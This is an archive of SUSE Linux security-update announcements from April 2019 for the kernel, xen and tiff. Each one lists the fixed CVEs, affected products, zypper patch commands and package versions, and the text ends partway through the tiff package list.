From sle-security-updates at lists.suse.com Mon Apr 1 07:09:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 15:09:52 +0200 (CEST) Subject: SUSE-SU-2019:0828-1: important: Security update for the Linux Kernel Message-ID: <20190401130952.14C7CFF2D@maintenance.suse.de> SUSE Security Update: Security update for the Linux Kernel ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0828-1 Rating: important References: #1012382 #1075697 #1082943 #1098599 #1102959 #1105402 #1107829 #1108145 #1109137 #1109330 #1110286 #1117645 #1119019 #1120691 #1121698 #1121805 #1122821 #1124728 #1124732 #1124735 #1125315 #1127155 #1127758 #1127961 #1128166 #1129080 #1129179 Cross-References: CVE-2018-14633 CVE-2019-2024 CVE-2019-6974 CVE-2019-7221 CVE-2019-7222 CVE-2019-9213 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise High Availability 12-SP2 SUSE Enterprise Storage 4 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that solves 6 vulnerabilities and has 21 fixes is now available. Description: The SUSE Linux Enterprise 12 SP2 LTSS kernel was updated to receive various security and bugfixes. The following security bugs were fixed: - CVE-2019-2024: A use-after-free when disconnecting a source was fixed which could lead to crashes. bnc#1129179). - CVE-2019-9213: expand_downwards in mm/mmap.c lacked a check for the mmap minimum address, which made it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task (bnc#1128166). - CVE-2018-14633: A security flaw was found in the chap_server_compute_md5() function in the ISCSI target code in the Linux kernel in a way an authentication request from an ISCSI initiator is processed. (bnc#1107829). - CVE-2019-7221: The KVM implementation in the Linux kernel had a Use-after-Free (bnc#1124732). - CVE-2019-7222: The KVM implementation in the Linux kernel had an Information Leak (bnc#1124735). - CVE-2019-6974: kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandled reference counting because of a race condition, which led to a use-after-free (bnc#1124728). The following non-security bugs were fixed: - copy_mount_string: Limit string length to PATH_MAX (bsc#1082943). - enic: add wq clean up budget (bsc#1075697, bsc#1120691. bsc#1102959). - ibmvscsi: Fix empty event pool access during host removal (bsc#1119019). - ipv4: ipv6: Adjust the frag mem limit after truesize has been changed (bsc#1110286). - kmps: obsolete older KMPs of the same flavour (bsc#1127155, bsc#1109137). - netfilter: ipv6: Adjust the frag mem limit after truesize has been changed (bsc#1110286). - perf/x86: Add sysfs entry to freeze counters on SMI (bsc#1121805). - perf/x86/intel: Delay memory deallocation until x86_pmu_dead_cpu() (bsc#1121805). - perf/x86/intel: Do not enable freeze-on-smi for PerfMon V1 (bsc#1121805). - perf/x86/intel: Fix memory corruption (bsc#1121805). - perf/x86/intel: Generalize dynamic constraint creation (bsc#1121805). - perf/x86/intel: Implement support for TSX Force Abort (bsc#1121805). - perf/x86/intel: Make cpuc allocations consistent (bsc#1121805). - pseries/energy: Use OF accessor function to read ibm,drc-indexes (bsc#1129080). - restore cond_resched() in shrink_dcache_parent() (bsc#1098599, bsc#1105402, bsc#1127758). - rps: flow_dissector: Fix uninitialized flow_keys used in __skb_get_hash possibly (bsc#1108145). - scsi: megaraid_sas: Send SYNCHRONIZE_CACHE for VD to firmware (bsc#1121698). - scsi: sym53c8xx: fix NULL pointer dereference panic in sym_int_sir() (bsc#1125315). - x86: Add TSX Force Abort CPUID/MSR (bsc#1121805). - x86: respect memory size limiting via mem= parameter (bsc#1117645). - x86/spectre_v2: Do not check microcode versions when running under hypervisors (bsc#1122821). - x86/xen: dont add memory above max allowed allocation (bsc#1117645). - xen-netfront: Fix hang on device removal (bnc#1012382). - xfrm: use complete IPv6 addresses for hash (bsc#1109330). - xfs: remove filestream item xfs_inode reference (bsc#1127961). Special Instructions and Notes: Please reboot the system after installing this update. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-828=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-828=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-828=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-828=1 - SUSE Linux Enterprise High Availability 12-SP2: zypper in -t patch SUSE-SLE-HA-12-SP2-2019-828=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-828=1 - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-828=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): kernel-default-4.4.121-92.104.1 kernel-default-base-4.4.121-92.104.1 kernel-default-base-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 kernel-default-devel-4.4.121-92.104.1 kernel-syms-4.4.121-92.104.1 - SUSE OpenStack Cloud 7 (noarch): kernel-devel-4.4.121-92.104.1 kernel-macros-4.4.121-92.104.1 kernel-source-4.4.121-92.104.1 - SUSE OpenStack Cloud 7 (x86_64): kgraft-patch-4_4_121-92_104-default-1-3.3.1 - SUSE OpenStack Cloud 7 (s390x): kernel-default-man-4.4.121-92.104.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): kernel-default-4.4.121-92.104.1 kernel-default-base-4.4.121-92.104.1 kernel-default-base-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 kernel-default-devel-4.4.121-92.104.1 kernel-syms-4.4.121-92.104.1 kgraft-patch-4_4_121-92_104-default-1-3.3.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (noarch): kernel-devel-4.4.121-92.104.1 kernel-macros-4.4.121-92.104.1 kernel-source-4.4.121-92.104.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): kernel-default-4.4.121-92.104.1 kernel-default-base-4.4.121-92.104.1 kernel-default-base-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 kernel-default-devel-4.4.121-92.104.1 kernel-syms-4.4.121-92.104.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le x86_64): kgraft-patch-4_4_121-92_104-default-1-3.3.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (noarch): kernel-devel-4.4.121-92.104.1 kernel-macros-4.4.121-92.104.1 kernel-source-4.4.121-92.104.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x): kernel-default-man-4.4.121-92.104.1 - SUSE Linux Enterprise Server 12-SP2-BCL (noarch): kernel-devel-4.4.121-92.104.1 kernel-macros-4.4.121-92.104.1 kernel-source-4.4.121-92.104.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): kernel-default-4.4.121-92.104.1 kernel-default-base-4.4.121-92.104.1 kernel-default-base-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 kernel-default-devel-4.4.121-92.104.1 kernel-syms-4.4.121-92.104.1 - SUSE Linux Enterprise High Availability 12-SP2 (ppc64le s390x x86_64): cluster-md-kmp-default-4.4.121-92.104.1 cluster-md-kmp-default-debuginfo-4.4.121-92.104.1 cluster-network-kmp-default-4.4.121-92.104.1 cluster-network-kmp-default-debuginfo-4.4.121-92.104.1 dlm-kmp-default-4.4.121-92.104.1 dlm-kmp-default-debuginfo-4.4.121-92.104.1 gfs2-kmp-default-4.4.121-92.104.1 gfs2-kmp-default-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 ocfs2-kmp-default-4.4.121-92.104.1 ocfs2-kmp-default-debuginfo-4.4.121-92.104.1 - SUSE Enterprise Storage 4 (noarch): kernel-devel-4.4.121-92.104.1 kernel-macros-4.4.121-92.104.1 kernel-source-4.4.121-92.104.1 - SUSE Enterprise Storage 4 (x86_64): kernel-default-4.4.121-92.104.1 kernel-default-base-4.4.121-92.104.1 kernel-default-base-debuginfo-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 kernel-default-devel-4.4.121-92.104.1 kernel-syms-4.4.121-92.104.1 kgraft-patch-4_4_121-92_104-default-1-3.3.1 - OpenStack Cloud Magnum Orchestration 7 (x86_64): kernel-default-4.4.121-92.104.1 kernel-default-debuginfo-4.4.121-92.104.1 kernel-default-debugsource-4.4.121-92.104.1 References: https://www.suse.com/security/cve/CVE-2018-14633.html https://www.suse.com/security/cve/CVE-2019-2024.html https://www.suse.com/security/cve/CVE-2019-6974.html https://www.suse.com/security/cve/CVE-2019-7221.html https://www.suse.com/security/cve/CVE-2019-7222.html https://www.suse.com/security/cve/CVE-2019-9213.html https://bugzilla.suse.com/1012382 https://bugzilla.suse.com/1075697 https://bugzilla.suse.com/1082943 https://bugzilla.suse.com/1098599 https://bugzilla.suse.com/1102959 https://bugzilla.suse.com/1105402 https://bugzilla.suse.com/1107829 https://bugzilla.suse.com/1108145 https://bugzilla.suse.com/1109137 https://bugzilla.suse.com/1109330 https://bugzilla.suse.com/1110286 https://bugzilla.suse.com/1117645 https://bugzilla.suse.com/1119019 https://bugzilla.suse.com/1120691 https://bugzilla.suse.com/1121698 https://bugzilla.suse.com/1121805 https://bugzilla.suse.com/1122821 https://bugzilla.suse.com/1124728 https://bugzilla.suse.com/1124732 https://bugzilla.suse.com/1124735 https://bugzilla.suse.com/1125315 https://bugzilla.suse.com/1127155 https://bugzilla.suse.com/1127758 https://bugzilla.suse.com/1127961 https://bugzilla.suse.com/1128166 https://bugzilla.suse.com/1129080 https://bugzilla.suse.com/1129179 From sle-security-updates at lists.suse.com Mon Apr 1 07:16:22 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 15:16:22 +0200 (CEST) Subject: SUSE-SU-2019:14001-1: important: Security update for xen Message-ID: <20190401131622.459F9FF2D@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14001-1 Rating: important References: #1027519 #1031382 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126198 #1126201 #1127400 #1129623 Cross-References: CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE Linux Enterprise Software Development Kit 11-SP4 SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that solves two vulnerabilities and has 10 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - Fixed an issue which could allow malicious PV guests may cause a host crash or gain access to data pertaining to other guests.Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198). - Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). Other issues fixed: - Fixed an issue where VMs crashing when migrating between dom0 hosts (bsc#1031382). - Upstream bug fixes (bsc#1027519) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 11-SP4: zypper in -t patch sdksp4-xen-14001=1 - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-xen-14001=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-xen-14001=1 Package List: - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 x86_64): xen-devel-4.4.4_40-61.43.2 - SUSE Linux Enterprise Server 11-SP4 (i586 x86_64): xen-kmp-default-4.4.4_40_3.0.101_108.87-61.43.2 xen-libs-4.4.4_40-61.43.2 xen-tools-domU-4.4.4_40-61.43.2 - SUSE Linux Enterprise Server 11-SP4 (x86_64): xen-4.4.4_40-61.43.2 xen-doc-html-4.4.4_40-61.43.2 xen-libs-32bit-4.4.4_40-61.43.2 xen-tools-4.4.4_40-61.43.2 - SUSE Linux Enterprise Server 11-SP4 (i586): xen-kmp-pae-4.4.4_40_3.0.101_108.87-61.43.2 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 x86_64): xen-debuginfo-4.4.4_40-61.43.2 xen-debugsource-4.4.4_40-61.43.2 References: https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1027519 https://bugzilla.suse.com/1031382 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126198 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1127400 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Mon Apr 1 07:18:42 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 15:18:42 +0200 (CEST) Subject: SUSE-SU-2019:0827-1: important: Security update for xen Message-ID: <20190401131842.348C7FF2D@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0827-1 Rating: important References: #1027519 #1056336 #1105528 #1108940 #1110924 #1111007 #1111011 #1111014 #1112188 #1114423 #1114988 #1115040 #1115045 #1115047 #1117756 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126198 #1126201 #1127400 #1129623 Cross-References: CVE-2017-13672 CVE-2018-10839 CVE-2018-17958 CVE-2018-17962 CVE-2018-17963 CVE-2018-18438 CVE-2018-18849 CVE-2018-19665 CVE-2018-19961 CVE-2018-19962 CVE-2018-19965 CVE-2018-19966 CVE-2018-19967 CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE Linux Enterprise Server 12-LTSS ______________________________________________________________________________ An update that solves 15 vulnerabilities and has 10 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - CVE-2017-13672: Fixed an out of bounds read access during display update (bsc#1056336). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140) - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2018-18849: Fixed an out of bounds msg buffer access which could lead to denial of service (bsc#1114423). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - CVE-2018-17958: Fixed an integer overflow leading to a buffer overflow in the rtl8139 component (bsc#1111007) - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS). (XSA-282) (bsc#1114988) - CVE-2018-19665: Fixed an integer overflow resulting in memory corruption in various Bluetooth functions, allowing this to crash qemu process resulting in Denial of Service (DoS). (bsc#1117756). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). - CVE-2018-19961, CVE-2018-19962: Fixed an issue related to insufficient TLB flushing with AMD IOMMUs, which potentially allowed a guest to escalate its privileges, may cause a Denial of Service (DoS) affecting the entire host, or may be able to access data it is not supposed to access. (XSA-275) (bsc#1115040) - CVE-2018-19966: Fixed an issue related to a previous fix for XSA-240, which conflicted with shadow paging and allowed a guest to cause Xen to crash, resulting in a Denial of Service (DoS) (XSA-280) (bsc#1115047). - CVE-2018-10839: Fixed an integer overflow leading to a buffer overflow in the ne2000 component (bsc#1110924). - CVE-2018-19965: Fixed an issue related to the INVPCID instruction in case non-canonical addresses are accessed, which may allow a guest to cause Xen to crash, resulting in a Denial of Service (DoS) affecting the entire host. (XSA-279) (bsc#1115045). - Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400). - Fixed an issue which could allow malicious PV guests may cause a host crash or gain access to data pertaining to other guests.Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - CVE-2018-17963: Fixed an integer overflow in relation to large packet sizes, leading to a denial of service (DoS). (bsc#1111014). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - CVE-2018-17962: Fixed an integer overflow leading to a buffer overflow in the pcnet component (bsc#1111011) - CVE-2018-18438: Fixed an integer overflow in ccid_card_vscard_read function which could lead to memory corruption (bsc#1112188). Other issues fixed: - Upstream bug fixes (bsc#1027519) - Fixed an issue where XEN SLE12-SP1 domU hangs on SLE12-SP3 HV1108940 (bsc#1108940). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-827=1 Package List: - SUSE Linux Enterprise Server 12-LTSS (x86_64): xen-4.4.4_40-22.77.1 xen-debugsource-4.4.4_40-22.77.1 xen-doc-html-4.4.4_40-22.77.1 xen-kmp-default-4.4.4_40_k3.12.61_52.146-22.77.1 xen-kmp-default-debuginfo-4.4.4_40_k3.12.61_52.146-22.77.1 xen-libs-32bit-4.4.4_40-22.77.1 xen-libs-4.4.4_40-22.77.1 xen-libs-debuginfo-32bit-4.4.4_40-22.77.1 xen-libs-debuginfo-4.4.4_40-22.77.1 xen-tools-4.4.4_40-22.77.1 xen-tools-debuginfo-4.4.4_40-22.77.1 xen-tools-domU-4.4.4_40-22.77.1 xen-tools-domU-debuginfo-4.4.4_40-22.77.1 References: https://www.suse.com/security/cve/CVE-2017-13672.html https://www.suse.com/security/cve/CVE-2018-10839.html https://www.suse.com/security/cve/CVE-2018-17958.html https://www.suse.com/security/cve/CVE-2018-17962.html https://www.suse.com/security/cve/CVE-2018-17963.html https://www.suse.com/security/cve/CVE-2018-18438.html https://www.suse.com/security/cve/CVE-2018-18849.html https://www.suse.com/security/cve/CVE-2018-19665.html https://www.suse.com/security/cve/CVE-2018-19961.html https://www.suse.com/security/cve/CVE-2018-19962.html https://www.suse.com/security/cve/CVE-2018-19965.html https://www.suse.com/security/cve/CVE-2018-19966.html https://www.suse.com/security/cve/CVE-2018-19967.html https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1027519 https://bugzilla.suse.com/1056336 https://bugzilla.suse.com/1105528 https://bugzilla.suse.com/1108940 https://bugzilla.suse.com/1110924 https://bugzilla.suse.com/1111007 https://bugzilla.suse.com/1111011 https://bugzilla.suse.com/1111014 https://bugzilla.suse.com/1112188 https://bugzilla.suse.com/1114423 https://bugzilla.suse.com/1114988 https://bugzilla.suse.com/1115040 https://bugzilla.suse.com/1115045 https://bugzilla.suse.com/1115047 https://bugzilla.suse.com/1117756 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126198 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1127400 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Mon Apr 1 07:22:30 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 15:22:30 +0200 (CEST) Subject: SUSE-SU-2019:0825-1: important: Security update for xen Message-ID: <20190401132230.52BA3FF2D@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0825-1 Rating: important References: #1056336 #1110924 #1111007 #1111011 #1111014 #1112188 #1114423 #1114988 #1115040 #1115047 #1117756 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126201 #1129623 Cross-References: CVE-2017-13672 CVE-2018-10839 CVE-2018-17958 CVE-2018-17962 CVE-2018-17963 CVE-2018-18438 CVE-2018-18849 CVE-2018-19665 CVE-2018-19961 CVE-2018-19962 CVE-2018-19966 CVE-2018-19967 CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP1-LTSS ______________________________________________________________________________ An update that solves 14 vulnerabilities and has 5 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - CVE-2018-18849: Fixed an out of bounds memory access issue that was found in the LSI53C895A SCSI Host Bus Adapter emulation while writing a message in lsi_do_msgin. It could occur during migration if the 'msg_len' field has an invalid value. A user/process could use this flaw to crash the Qemu process resulting in DoS (bsc#1114423). - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS). (XSA-282) (bsc#1114988) - CVE-2018-19665: Fixed an integer overflow in Bluetooth routines allows memory corruption (bsc#1117756). - CVE-2018-18438: Fixed an integer overflow in ccid_card_vscard_read function which allows memory corruption (bsc#1112188). - CVE-2018-17962: Fixed a Buffer Overflow in pcnet_receive in hw/net/pcnet.c because an incorrect integer data type is used (bsc#1111011). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - CVE-2018-19961 CVE-2018-19962: Fixed insufficient TLB flushing / improper large page mappings with AMD IOMMUs (XSA-275)(bsc#1115040). - CVE-2018-17963: Fixed qemu_deliver_packet_iov in net/net.c that accepts packet sizes greater than INT_MAX, which allows attackers to cause a denial of service or possibly have unspecified other impact. (bsc#1111014) - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196) - CVE-2018-17958: Fixed a Buffer Overflow in rtl8139_do_receive in hw/net/rtl8139.c because an incorrect integer data type is used (bsc#1111007). - CVE-2018-10839: Fixed an integer overflow which could lead to a buffer overflow issue (bsc#1110924). - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - CVE-2018-19966: Fixed issue introduced by XSA-240 that could have caused conflicts with shadow paging (XSA-280)(bsc#1115047). - CVE-2017-13672: Fixed an out of bounds read access during display update (bsc#1056336). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-825=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-825=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): xen-4.5.5_28-22.58.1 xen-debugsource-4.5.5_28-22.58.1 xen-doc-html-4.5.5_28-22.58.1 xen-kmp-default-4.5.5_28_k3.12.74_60.64.107-22.58.1 xen-kmp-default-debuginfo-4.5.5_28_k3.12.74_60.64.107-22.58.1 xen-libs-32bit-4.5.5_28-22.58.1 xen-libs-4.5.5_28-22.58.1 xen-libs-debuginfo-32bit-4.5.5_28-22.58.1 xen-libs-debuginfo-4.5.5_28-22.58.1 xen-tools-4.5.5_28-22.58.1 xen-tools-debuginfo-4.5.5_28-22.58.1 xen-tools-domU-4.5.5_28-22.58.1 xen-tools-domU-debuginfo-4.5.5_28-22.58.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (x86_64): xen-4.5.5_28-22.58.1 xen-debugsource-4.5.5_28-22.58.1 xen-doc-html-4.5.5_28-22.58.1 xen-kmp-default-4.5.5_28_k3.12.74_60.64.107-22.58.1 xen-kmp-default-debuginfo-4.5.5_28_k3.12.74_60.64.107-22.58.1 xen-libs-32bit-4.5.5_28-22.58.1 xen-libs-4.5.5_28-22.58.1 xen-libs-debuginfo-32bit-4.5.5_28-22.58.1 xen-libs-debuginfo-4.5.5_28-22.58.1 xen-tools-4.5.5_28-22.58.1 xen-tools-debuginfo-4.5.5_28-22.58.1 xen-tools-domU-4.5.5_28-22.58.1 xen-tools-domU-debuginfo-4.5.5_28-22.58.1 References: https://www.suse.com/security/cve/CVE-2017-13672.html https://www.suse.com/security/cve/CVE-2018-10839.html https://www.suse.com/security/cve/CVE-2018-17958.html https://www.suse.com/security/cve/CVE-2018-17962.html https://www.suse.com/security/cve/CVE-2018-17963.html https://www.suse.com/security/cve/CVE-2018-18438.html https://www.suse.com/security/cve/CVE-2018-18849.html https://www.suse.com/security/cve/CVE-2018-19665.html https://www.suse.com/security/cve/CVE-2018-19961.html https://www.suse.com/security/cve/CVE-2018-19962.html https://www.suse.com/security/cve/CVE-2018-19966.html https://www.suse.com/security/cve/CVE-2018-19967.html https://www.suse.com/security/cve/CVE-2019-6778.html https://www.suse.com/security/cve/CVE-2019-9824.html https://bugzilla.suse.com/1056336 https://bugzilla.suse.com/1110924 https://bugzilla.suse.com/1111007 https://bugzilla.suse.com/1111011 https://bugzilla.suse.com/1111014 https://bugzilla.suse.com/1112188 https://bugzilla.suse.com/1114423 https://bugzilla.suse.com/1114988 https://bugzilla.suse.com/1115040 https://bugzilla.suse.com/1115047 https://bugzilla.suse.com/1117756 https://bugzilla.suse.com/1123157 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1129623 From sle-security-updates at lists.suse.com Mon Apr 1 07:25:18 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 1 Apr 2019 15:25:18 +0200 (CEST) Subject: SUSE-SU-2019:14002-1: Security update for tiff Message-ID: <20190401132518.247C1FF2D@maintenance.suse.de> SUSE Security Update: Security update for tiff ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14002-1 Rating: low References: #1121626 #983268 Cross-References: CVE-2016-5102 CVE-2019-6128 Affected Products: SUSE Linux Enterprise Software Development Kit 11-SP4 SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for tiff fixes the following issue: Security vulnerabilities fixed: - CVE-2016-5102: Fixed a buffer overflow in readgifimage() (bsc#983268) - CVE-2019-6128: Fixed a memory leak in the TIFFFdOpen function in tif_unix.c (bsc#1121626) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 11-SP4: zypper in -t patch sdksp4-tiff-14002=1 - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-tiff-14002=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-tiff-14002=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-tiff-14002=1 Package List: - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64): libtiff-devel-3.8.2-141.169.31.1 - SUSE Linux Enterprise Software Development Kit 11-SP4 (ppc64 s390x x86_64): libtiff-devel-32bit-3.8.2-141.169.31.1 - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64): libtiff3-3.8.2-141.169.31.1 tiff-3.8.2-141.169.31.1 - SUSE Linux Enterprise Server 11-SP4 (ppc64 s390x x86_64): libtiff3-32bit-3.8.2-141.169.31.1 - SUSE Linux Enterprise Server 11-SP4 (ia64): libtiff3-x86-3.8.2-141.169.31.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): libtiff3-3.8.2-141.169.31.1 tiff-3.8.2-141.169.31.1 - SUSE Linux 